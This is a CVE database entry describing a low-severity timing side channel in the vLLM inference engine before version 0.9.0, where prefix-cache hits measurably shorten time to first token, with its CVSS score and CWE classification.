CVE-2025-46570

Published May 29, 2025

Last updated 2 months ago

Overview

Description
vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). These timing differences caused by matching chunks are significant enough to be recognized and exploited. This issue has been patched in version 0.9.0.
Source
security-advisories@github.com
NVD status
Undergoing Analysis

Risk scores

CVSS 3.1

Type
Secondary
Base score
2.6
Impact score
1.4
Exploitability score
1.2
Vector string
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N
Severity
LOW

Weaknesses

security-advisories@github.com
CWE-208

Social media

Hype score
Not currently trending